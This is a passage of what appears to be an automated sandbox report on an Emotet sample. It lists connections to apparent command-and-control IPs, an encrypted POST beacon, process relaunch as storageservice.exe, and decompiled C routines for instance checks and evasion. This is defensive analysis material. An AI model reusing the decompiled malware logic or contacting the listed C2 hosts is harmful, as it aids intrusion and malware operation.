                    Apr 10, 2021 18:47:54.537854910 CEST | 49738 | 443 | 192.168.2.4 | 79.172.249.82
                    Apr 10, 2021 18:47:54.573343992 CEST | 443 | 49738 | 79.172.249.82 | 192.168.2.4
                    Apr 10, 2021 18:48:24.935547113 CEST | 49746 | 8080 | 192.168.2.4 | 193.169.54.12
                    Apr 10, 2021 18:48:27.960725069 CEST | 49746 | 8080 | 192.168.2.4 | 193.169.54.12
                    Apr 10, 2021 18:48:33.976751089 CEST | 49746 | 8080 | 192.168.2.4 | 193.169.54.12
                    Apr 10, 2021 18:49:17.192873955 CEST | 49757 | 8080 | 192.168.2.4 | 173.230.145.224
                    Apr 10, 2021 18:49:17.364305019 CEST | 8080 | 49757 | 173.230.145.224 | 192.168.2.4
                    Apr 10, 2021 18:49:17.870801926 CEST | 49757 | 8080 | 192.168.2.4 | 173.230.145.224
                    Apr 10, 2021 18:49:18.042294979 CEST | 8080 | 49757 | 173.230.145.224 | 192.168.2.4
                    Apr 10, 2021 18:49:18.542711973 CEST | 49757 | 8080 | 192.168.2.4 | 173.230.145.224
                    Apr 10, 2021 18:49:18.714617968 CEST | 8080 | 49757 | 173.230.145.224 | 192.168.2.4
                    Apr 10, 2021 18:49:48.950465918 CEST | 49763 | 7080 | 192.168.2.4 | 80.86.91.232
                    Apr 10, 2021 18:49:51.951813936 CEST | 49763 | 7080 | 192.168.2.4 | 80.86.91.232

                    HTTP Request Dependency Graph

                    • 79.172.249.82:443

                    HTTP Packets

                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    0 | 192.168.2.4 | 49738 | 79.172.249.82 | 443 | C:\Windows\SysWOW64\storageservice.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Apr 10, 2021 18:47:54.501919985 CEST | 284 | OUT | POST / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: 79.172.249.82:443
                    Content-Length: 468
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Data Raw: 77 ee 51 67 a8 c2 dc 38 20 bc 12 53 17 05 a1 e7 44 fa 23 2e b7 b8 71 13 ca 5f 34 cb 7d 0c be 09 5f d9 5a 5d 85 11 56 95 de d3 de 12 62 eb a8 08 e0 25 70 14 f1 93 c1 00 4a d5 23 a5 0e 77 2e d9 75 a6 89 1b 16 5a c1 dd 31 ce 32 df 13 a0 62 81 87 92 a5 75 31 ed 00 f4 09 08 7f ae 0e 3e f8 65 d0 b5 42 c2 d2 95 50 fe 33 48 54 55 da 3f 44 b3 df eb cb 47 92 31 e0 5c 2c 4d 46 89 f3 f7 e8 28 63 c8 8b 2d 43 6c f6 74 39 33 7f 21 86 82 16 e9 af 01 09 96 57 45 d8 63 20 47 a2 c1 62 3c 2d 74 bb 9d 73 46 51 ff 00 e2 16 99 bd 8a 96 75 c0 cc 9b 6b c8 76 2f 7d 1f 55 df 13 a3 4e 79 3d 0a 7d c1 09 f3 25 b0 1a 81 32 06 db 60 eb aa f9 77 7f 4f d5 65 00 d6 0f 40 ae d6 80 7d 6d d3 ee 85 09 f6 22 03 2f 33 e5 8b 34 8b db c6 73 67 06 01 9b 17 0a 4e 5b 3c f2 f3 aa 73 a9 cd 5f 3c 34 db da c3 54 41 f5 ea 56 26 df 67 5a 61 72 63 60 16 79 a7 db e1 af f6 2f 66 31 e2 88 4f 2d b7 94 7e cd ce 96 27 93 d4 79 59 88 98 23 46 23 99 b4 91 75 8e c1 dc 3b dd db f3 c3 0e 36 95 96 a2 94 42 6d b3 f7 b1 24 01 e7 71 a7 5e 9b 36 26 b2 96 3c 92 d8 90 7f db 79 c4 c3 fa 4e 68 ad ba 03 e9 19 9e d0 8a 2c 33 fb bd b2 75 f0 06 1f 2a 3f 5d 5b 6a 5d b5 14 d0 23 dd 58 78 93 f6 34 14 5e 10 ba 25 6e 54 d1 9d e9 4b b7 80 6f 7e 87 f1 04 26 22 80 65 b6 e1 bb f9 5c a2 ed 76 32 ff 84 0b d3 07 45 59 19 31 0c fe 79 50 52 83 bd d4 f3 e6 d7 cc e7 56 eb b7 23 59 81 8c 16 9c 72 74 e3 4a 61 67 88 c4 db bf 46 0d 23 37 4c 63 74 58 1e 57 77 32 e6 ef 17 cd 09
                    Data Ascii: wQg8 SD#.q_4}_Z]Vb%pJ#w.uZ12bu1>eBP3HTU?DG1\,MF(c-Clt93!WEc Gb<-tsFQukv/}UNy=}%2`wOe@}m"/34sgN[<s_<4TAV&gZarc`y/f1O-~'yY#F#u;6Bm$q^6&<yNh,3u*?][j]#Xx4^%nTKo~&"e\v2EY1yPRV#YrtJagF#7LctXWw2
                    Apr 10, 2021 18:47:54.537532091 CEST | 284 | IN | HTTP/1.1 400 Bad Request
                    Date: Sat, 10 Apr 2021 16:47:54 GMT
                    Server: Apache/2.4.25 (Debian)
                    Content-Length: 362
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>


                    Code Manipulations

                    Statistics

                    CPU Usage

                    Memory Usage

                    Behavior

                    System Behavior

                    General

                    Start time:18:47:45
                    Start date:10/04/2021
                    Path:C:\Users\user\Desktop\zeD11Fztx8.exe
                    Wow64 process (32bit):true
                    Commandline:'C:\Users\user\Desktop\zeD11Fztx8.exe'
                    Imagebase:0x1380000
                    File size:45568 bytes
                    MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.632271273.0000000001381000.00000020.00020000.sdmp, Author: Joe Security
                    Reputation:low

                    General

                    Start time:18:47:45
                    Start date:10/04/2021
                    Path:C:\Users\user\Desktop\zeD11Fztx8.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\zeD11Fztx8.exe
                    Imagebase:0x1380000
                    File size:45568 bytes
                    MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.640361081.0000000001381000.00000020.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000000.633157257.0000000001381000.00000020.00020000.sdmp, Author: Joe Security
                    Reputation:low

                    General

                    Start time:18:47:48
                    Start date:10/04/2021
                    Path:C:\Windows\SysWOW64\storageservice.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\storageservice.exe
                    Imagebase:0x1380000
                    File size:45568 bytes
                    MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.638984509.0000000001381000.00000020.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.640209506.0000000001381000.00000020.00020000.sdmp, Author: Joe Security
                    Reputation:low

                    General

                    Start time:18:47:48
                    Start date:10/04/2021
                    Path:C:\Windows\SysWOW64\storageservice.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\storageservice.exe
                    Imagebase:0x1380000
                    File size:45568 bytes
                    MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000000.639793428.0000000001381000.00000020.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.898946523.0000000001381000.00000020.00020000.sdmp, Author: Joe Security
                    Reputation:low

                    General

                    Start time:18:49:17
                    Start date:10/04/2021
                    Path:C:\Windows\System32\svchost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                    Imagebase:0x7ff6eb840000
                    File size:51288 bytes
                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:18:49:35
                    Start date:10/04/2021
                    Path:C:\Windows\System32\svchost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                    Imagebase:0x7ff6eb840000
                    File size:51288 bytes
                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:18:49:49
                    Start date:10/04/2021
                    Path:C:\Windows\System32\svchost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                    Imagebase:0x7ff6eb840000
                    File size:51288 bytes
                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    Code Analysis

                      Execution Graph

                      Execution Coverage:0.3%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:9.2%
                      Total number of Nodes:531
                      Total number of Limit Nodes:3

                      Graph

                      execution_graph: rendered call graph (node id, code address, called Windows APIs and edges between nodes; 531 nodes as counted above). The raw node/edge dump of the diagram is not reproduced as text.

                      Executed Functions

                      Control-flow Graph

                      C-Code - Quality: 90%
                      			E013815B0(void* __ebx) {
                      				void* _v8;
                      				struct _PROCESS_INFORMATION _v24;
                      				struct _STARTUPINFOW _v92;
                      				short _v220;
                      				short _v348;
                      				short _v868;
                      				intOrPtr* _t23;
                      				void* _t40;
                      				int _t47;
                      				WCHAR* _t61;
                      				void* _t64;
                      				void* _t66;
                      				void* _t67;
                      				void* _t68;
                      				void* _t69;
                      				void* _t70;
                      
                      				GetModuleFileNameW(0,  &_v868, 0x104);
                      				_t61 =  &_v868;
                      				_t23 = E013819E0(_t61);
                      				 *((intOrPtr*)(__ebx + 0x4baf8)) =  *((intOrPtr*)(__ebx + 0x4baf8)) + _t61;
                      				 *_t23 =  *_t23 + _t23;
                      				E01381830(0x1381004, _t64, 0x4dbac13f,  &_v8);
                      				_t68 = _v8;
                      				 *0x138c200( &_v348, 0x40, _t68, _t66);
                      				HeapFree(GetProcessHeap(), 0, _t68);
                      				E01381830(0x1381000, 4, 0x4dbac13f,  &_v8);
                      				_t69 = _v8;
                      				 *0x138c200( &_v220, 0x40, _t69, _t66);
                      				HeapFree(GetProcessHeap(), 0, _t69);
                      				_t70 = CreateEventW(0, 1, 0,  &_v348);
                      				if(_t70 == 0) {
                      					L4:
                      					return 0;
                      				} else {
                      					_t40 = CreateMutexW(0, 1,  &_v220); // executed
                      					_t67 = _t40;
                      					if(_t67 != 0) {
                      						if(GetLastError() != 0xb7) {
                      							memset( &_v92, 0, 0x44);
                      							_v92.cb = 0x44;
                      							_v92.dwFlags = 0x80;
                      							_t47 = CreateProcessW( &_v868, 0, 0, 0, 0, 0, 0, 0,  &_v92,  &_v24); // executed
                      							if(_t47 == 0) {
                      								goto L4;
                      							} else {
                      								WaitForSingleObject(_t70, 0xffffffff);
                      								CloseHandle(_v24);
                      								CloseHandle(_v24.hThread);
                      								CloseHandle(_t70);
                      								CloseHandle(_t67);
                      								return 1;
                      							}
                      						} else {
                      							SetEvent(_t70);
                      							CloseHandle(_t70);
                      							CloseHandle(_t67);
                      							E01389C50(0x1381000);
                      							return 1;
                      						}
                      					} else {
                      						CloseHandle(_t70);
                      						goto L4;
                      					}
                      				}
                      			}

                      APIs
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 013815C9
                        • Part of subcall function 01381830: GetProcessHeap.KERNEL32(00000008,01389F6B,00000000,00000000,01381004,?,013815F4,4DBAC13F,01389F6B,?,00000000), ref: 01381844
                        • Part of subcall function 01381830: RtlAllocateHeap.NTDLL(00000000,?,013815F4), ref: 0138184B
                      • _snwprintf.NTDLL ref: 01381602
                      • GetProcessHeap.KERNEL32(00000000,01389F6B), ref: 0138160E
                      • HeapFree.KERNEL32(00000000), ref: 01381615
                      • _snwprintf.NTDLL ref: 01381641
                      • GetProcessHeap.KERNEL32(00000000,01389F6B), ref: 0138164D
                      • HeapFree.KERNEL32(00000000), ref: 01381654
                      • CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 01381667
                      • CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 0138167E
                      • CloseHandle.KERNEL32(00000000), ref: 0138168B
                      • GetLastError.KERNEL32 ref: 01381699
                      • SetEvent.KERNEL32(00000000), ref: 013816A7
                      • CloseHandle.KERNEL32(00000000), ref: 013816AE
                      • CloseHandle.KERNEL32(00000000), ref: 013816B5
                      • memset.NTDLL ref: 013816D3
                      • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 01381707
                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 01381714
                      • CloseHandle.KERNEL32(?), ref: 0138171D
                      • CloseHandle.KERNEL32(?), ref: 01381726
                      • CloseHandle.KERNEL32(00000000), ref: 0138172D
                      • CloseHandle.KERNEL32(00000000), ref: 01381734
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseHandle$Heap$Process$Create$EventFree_snwprintf$AllocateErrorFileLastModuleMutexNameObjectSingleWaitmemset
                      • String ID: D
                      • API String ID: 2830143876-2746444292
                      • Opcode ID: f417b767315e65e855c5565859d1b3f12ce1b7508597f69a8f3ce58494160c11
                      • Instruction ID: 0ca15fab0d10fd86254ffa4388413487cecc58299c8af1e73b4b0160c4330919
                      • Opcode Fuzzy Hash: f417b767315e65e855c5565859d1b3f12ce1b7508597f69a8f3ce58494160c11
                      • Instruction Fuzzy Hash: 04418F71900219ABEB20ABA4EC8DFEE7B7CFB44716F040051FA09E6184DB749A458BB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 84%
                      			E01381599(signed int __eax, void* __ebx, intOrPtr* __ecx, void* __edx, void* __esi, void* __fp0) {
                      				void* _v8;
                      				struct _PROCESS_INFORMATION _v24;
                      				struct _STARTUPINFOW _v92;
                      				short _v220;
                      				short _v348;
                      				short _v868;
                      				short _v876;
                      				intOrPtr* _t27;
                      				void* _t44;
                      				int _t51;
                      				WCHAR* _t66;
                      				void* _t71;
                      				intOrPtr _t73;
                      				void* _t75;
                      				void* _t79;
                      				void* _t80;
                      				void* _t81;
                      				void* _t85;
                      				intOrPtr* _t90;
                      
                      				asm("daa");
                      				_t71 = __edx -  *_t90;
                      				asm("salc");
                      				 *((intOrPtr*)(__esi + 2)) =  *((intOrPtr*)(__esi + 2)) + (__eax | 0x0000004a);
                      				_t73 =  *__ecx;
                      				GetModuleFileNameW(0,  &_v876, 0x104);
                      				_t66 =  &_v876;
                      				_t27 = E013819E0(_t66);
                      				 *((intOrPtr*)(__ebx + 0x4baf8)) =  *((intOrPtr*)(__ebx + 0x4baf8)) + _t66;
                      				 *_t27 =  *_t27 + _t27;
                      				E01381830(0x1381004, _t71, 0x4dbac13f,  &_v8);
                      				_t79 = _v8;
                      				 *0x138c200( &_v348, 0x40, _t79, _t73, _t73, __esi, _t85, _t90, cs);
                      				HeapFree(GetProcessHeap(), 0, _t79);
                      				E01381830(0x1381000, 4, 0x4dbac13f,  &_v8);
                      				_t80 = _v8;
                      				 *0x138c200( &_v220, 0x40, _t80, _t73);
                      				HeapFree(GetProcessHeap(), 0, _t80);
                      				_t81 = CreateEventW(0, 1, 0,  &_v348);
                      				if(_t81 == 0) {
                      					L5:
                      					return 0;
                      				} else {
                      					_t44 = CreateMutexW(0, 1,  &_v220); // executed
                      					_t75 = _t44;
                      					if(_t75 != 0) {
                      						if(GetLastError() != 0xb7) {
                      							memset( &_v92, 0, 0x44);
                      							_v92.cb = 0x44;
                      							_v92.dwFlags = 0x80;
                      							_t51 = CreateProcessW( &_v868, 0, 0, 0, 0, 0, 0, 0,  &_v92,  &_v24); // executed
                      							if(_t51 == 0) {
                      								goto L5;
                      							} else {
                      								WaitForSingleObject(_t81, 0xffffffff);
                      								CloseHandle(_v24);
                      								CloseHandle(_v24.hThread);
                      								CloseHandle(_t81);
                      								CloseHandle(_t75);
                      								return 1;
                      							}
                      						} else {
                      							SetEvent(_t81);
                      							CloseHandle(_t81);
                      							CloseHandle(_t75);
                      							E01389C50(0x1381000);
                      							return 1;
                      						}
                      					} else {
                      						CloseHandle(_t81);
                      						goto L5;
                      					}
                      				}
                      			}

                      APIs
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 013815C9
                        • Part of subcall function 01381830: GetProcessHeap.KERNEL32(00000008,01389F6B,00000000,00000000,01381004,?,013815F4,4DBAC13F,01389F6B,?,00000000), ref: 01381844
                        • Part of subcall function 01381830: RtlAllocateHeap.NTDLL(00000000,?,013815F4), ref: 0138184B
                      • _snwprintf.NTDLL ref: 01381602
                      • GetProcessHeap.KERNEL32(00000000,01389F6B), ref: 0138160E
                      • HeapFree.KERNEL32(00000000), ref: 01381615
                      • _snwprintf.NTDLL ref: 01381641
                      • GetProcessHeap.KERNEL32(00000000,01389F6B), ref: 0138164D
                      • HeapFree.KERNEL32(00000000), ref: 01381654
                      • CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 01381667
                      • CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 0138167E
                      • CloseHandle.KERNEL32(00000000), ref: 0138168B
                      • GetLastError.KERNEL32 ref: 01381699
                      • SetEvent.KERNEL32(00000000), ref: 013816A7
                      • CloseHandle.KERNEL32(00000000), ref: 013816AE
                      • CloseHandle.KERNEL32(00000000), ref: 013816B5
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$CloseHandleProcess$CreateEventFree_snwprintf$AllocateErrorFileLastModuleMutexName
                      • String ID:
                      • API String ID: 4183562332-0
                      • Opcode ID: e1c8bf82618cf8aa4f923960bf37800a325d71516d9d37241a2345dfa7cdbe36
                      • Instruction ID: 06634eb76c0ee9f94a11593721853fb87829af7bd8f6b12ea592252a6ed68e83
                      • Opcode Fuzzy Hash: e1c8bf82618cf8aa4f923960bf37800a325d71516d9d37241a2345dfa7cdbe36
                      • Instruction Fuzzy Hash: 6F21D371640205BFEB20ABA4DC4AFDE3B7DEB80716F044081FA08E6184CA309A468BA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 80%
                      			E01381575(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __fp0) {
                      				void* _v4;
                      				struct _PROCESS_INFORMATION _v20;
                      				struct _STARTUPINFOW _v88;
                      				short _v216;
                      				short _v344;
                      				short _v864;
                      				void* _v880;
                      				signed char _t34;
                      				void* _t51;
                      				int _t58;
                      				signed char _t71;
                      				signed char _t73;
                      				void* _t78;
                      				void* _t79;
                      				void* _t82;
                      				void* _t84;
                      				signed char _t87;
                      				void* _t89;
                      				void* _t91;
                      				void* _t95;
                      				void* _t96;
                      				void* _t97;
                      				void* _t105;
                      				void* _t127;
                      
                      				L0:
                      				while(1) {
                      					_t84 = __edx;
                      					_t79 = __ecx;
                      					_t78 = __ebx;
                      					_t127 = __fp0 -  *[fs:edx];
                      					_t34 = __eax + 0x527dd026 | 0x0000004a;
                      					asm("fistp qword [ecx+ebx]");
                      					if(__ecx >= _t34) {
                      						break;
                      					}
                      					L14:
                      					_t127 = _t127 -  *[fs:edx];
                      					_t71 = _t73 | 0x0000004a;
                      					asm("retf");
                      					_t79 = _t82 - _t105;
                      					asm("daa");
                      					_push(__ebx);
                      					if (_t79 < 0) goto L5;
                      					L15:
                      					_t87 = _t71;
                      				}
                      				L19:
                      				 *((intOrPtr*)(_t78 + 0x4baf8)) =  *((intOrPtr*)(_t78 + 0x4baf8)) + _t79;
                      				 *_t34 =  *_t34 + _t34;
                      				E01381830(0x1381004, _t84, 0x4dbac13f,  &_v4);
                      				_t95 = _v4;
                      				 *0x138c200( &_v344, 0x40, _t95, _t89);
                      				HeapFree(GetProcessHeap(), 0, _t95);
                      				E01381830(0x1381000, 4, 0x4dbac13f,  &_v4);
                      				_t96 = _v4;
                      				 *0x138c200( &_v216, 0x40, _t96, _t89);
                      				HeapFree(GetProcessHeap(), 0, _t96);
                      				_t97 = CreateEventW(0, 1, 0,  &_v344);
                      				if(_t97 == 0) {
                      					L22:
                      					return 0;
                      				} else {
                      					_t51 = CreateMutexW(0, 1,  &_v216); // executed
                      					_t91 = _t51;
                      					if(_t91 != 0) {
                      						if(GetLastError() != 0xb7) {
                      							memset( &_v88, 0, 0x44);
                      							_v88.cb = 0x44;
                      							_v88.dwFlags = 0x80;
                      							_t58 = CreateProcessW( &_v864, 0, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20); // executed
                      							if(_t58 == 0) {
                      								goto L22;
                      							} else {
                      								WaitForSingleObject(_t97, 0xffffffff);
                      								CloseHandle(_v20);
                      								CloseHandle(_v20.hThread);
                      								CloseHandle(_t97);
                      								CloseHandle(_t91);
                      								return 1;
                      							}
                      						} else {
                      							SetEvent(_t97);
                      							CloseHandle(_t97);
                      							CloseHandle(_t91);
                      							E01389C50(0x1381000);
                      							return 1;
                      						}
                      					} else {
                      						CloseHandle(_t97);
                      						goto L22;
                      					}
                      				}
                      			}

                      APIs
                      • _snwprintf.NTDLL ref: 01381602
                      • GetProcessHeap.KERNEL32(00000000,01389F6B), ref: 0138160E
                      • HeapFree.KERNEL32(00000000), ref: 01381615
                      • _snwprintf.NTDLL ref: 01381641
                      • GetProcessHeap.KERNEL32(00000000,01389F6B), ref: 0138164D
                      • HeapFree.KERNEL32(00000000), ref: 01381654
                      • CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 01381667
                      • CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 0138167E
                      • CloseHandle.KERNEL32(00000000), ref: 0138168B
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$CreateFreeProcess_snwprintf$CloseEventHandleMutex
                      • String ID:
                      • API String ID: 2595929981-0
                      • Opcode ID: 433d20031fa52916c380d02fe48128f6c35f6e5e48bb51b61724f9eb80f6c0bb
                      • Instruction ID: 34cb7cce5e7594bba70b648ae5e7e674ff2ae5179e7599320fdafe1fca924b0e
                      • Opcode Fuzzy Hash: 433d20031fa52916c380d02fe48128f6c35f6e5e48bb51b61724f9eb80f6c0bb
                      • Instruction Fuzzy Hash: BD21D571A04355AFEF31ABA59C49FDE3B7CEF81715F040091FA08EB281CA308A468B71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 100%
                      			_entry_() {
                      				void* _t6;
                      				void* _t11;
                      				void* _t18;
                      
                      				E01381B10(E01381BE0(0xd22e2014), 0x13811f0, 9, 0x3966646c, 0x138c1f0);
                      				E01381B10(E01381BE0(0x8f7ee672), 0x13810d0, 0x48, 0x6677a1d2, 0x138c0d0);
                      				_t6 = RtlAllocateHeap(GetProcessHeap(), 0, 0x8000000); // executed
                      				_t18 = _t6;
                      				if(_t18 != 0) {
                      					memset(_t18, 0, 0x8000000);
                      					RtlFreeHeap(GetProcessHeap(), 0, _t18); // executed
                      					E013815B0(_t11); // executed
                      				}
                      				ExitProcess(0);
                      			}

                      APIs
                      • GetProcessHeap.KERNEL32(00000000,08000000), ref: 01389F32
                      • RtlAllocateHeap.NTDLL(00000000), ref: 01389F39
                      • memset.NTDLL ref: 01389F4D
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01389F59
                      • RtlFreeHeap.NTDLL(00000000), ref: 01389F60
                        • Part of subcall function 013815B0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 013815C9
                        • Part of subcall function 013815B0: _snwprintf.NTDLL ref: 01381602
                        • Part of subcall function 013815B0: GetProcessHeap.KERNEL32(00000000,01389F6B), ref: 0138160E
                        • Part of subcall function 013815B0: HeapFree.KERNEL32(00000000), ref: 01381615
                        • Part of subcall function 013815B0: _snwprintf.NTDLL ref: 01381641
                        • Part of subcall function 013815B0: GetProcessHeap.KERNEL32(00000000,01389F6B), ref: 0138164D
                        • Part of subcall function 013815B0: HeapFree.KERNEL32(00000000), ref: 01381654
                        • Part of subcall function 013815B0: CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 01381667
                        • Part of subcall function 013815B0: CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 0138167E
                        • Part of subcall function 013815B0: CloseHandle.KERNEL32(00000000), ref: 0138168B
                      • ExitProcess.KERNEL32 ref: 01389F6D
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$Free$Create_snwprintf$AllocateCloseEventExitFileHandleModuleMutexNamememset
                      • String ID:
                      • API String ID: 871367918-0
                      • Opcode ID: b3f0213c0bdf6bda41b205d5e3970cc7be6a8c11402c8057db4603c4a09763e7
                      • Instruction ID: 14b9bfa49444ca934a4ae8f3f5d806ca51bf5bbdba4939960029644edc211cc7
